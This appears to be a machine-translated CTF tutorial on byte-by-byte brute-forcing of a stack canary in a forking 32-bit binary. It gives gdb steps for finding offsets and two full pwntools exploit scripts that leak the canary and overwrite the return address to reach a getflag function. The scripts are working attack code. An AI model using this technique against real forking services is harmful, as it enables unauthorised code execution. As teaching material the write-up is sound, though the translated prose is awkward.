Canary learning (blasting Canary)

one-by-one blasting Canary principle

• For Canary, although each process restarted after a different Canary, but Cannary the same process in different threads of the same, and the child process created by the fork in the canary function is the same, because the fork function will be a direct copy of the parent process RAM.
• LSB 0x00, after successive blasting, blasting canary if unsuccessful, the program crashes; blasting successful, the program performs the following logic. Which can determine whether the blast was successful.
• We can use such features, completely by-byte burst out Canary.

example

Opened the Canary protection

IDA disassembler found, the program contains a fork function, blasting may canary

stack overflow function fun

Dynamic debugging, see Offset

A breakpoint at a function at the fork Lower Dir

In the canary push at the second breakpoint

gdb bin1
b *0x0804874B
b *0x0804870C
r
set follow-fork-mode child
//跟随子进程
c
telescope $esp 35
canary

• You can be isolated and the offset between the canary EBP;
• Similarly buf and the offset between ebp

Preparation of exp, blasting

from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context(arch='i386', os='linux')
local = 1
elf = ELF('./bin1')

if local:
    p = process('./bin1')
    libc = elf.libc

else:
    p = remote('',)
    libc = ELF('./')
p.recvuntil('welcome\n')
canary = '\x00'
for k in range(3):
    for i in range(256):
        print "the " + str(k) + ": " + chr(i)
        p.send('a'*100 + canary + chr(i))
        a = p.recvuntil("welcome\n")
        print a
        if "sucess" in a:
                canary += chr(i)
                print "canary: " + canary
                break

After using the transmission function address payload getflag

from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context(arch='i386', os='linux')
local = 1
elf = ELF('./bin1')

if local:
    p = process('./bin1')
    libc = elf.libc

else:
    p = remote('',)
    libc = ELF('./')
p.recvuntil('welcome\n')
canary = '\x00'
for k in range(3):
    for i in range(256):
        print "the " + str(k) + ": " + chr(i)
        p.send('a'*100 + canary + chr(i))
        a = p.recvuntil("welcome\n")
        print a
        if "sucess" in a:
                canary += chr(i)
                print "canary: " + canary
                break
addr = 0x0804863B
payload = 'A' * 100 + canary + 'A' * 12 + p32(addr)

p.send(payload)
p.interactive()

Address file

download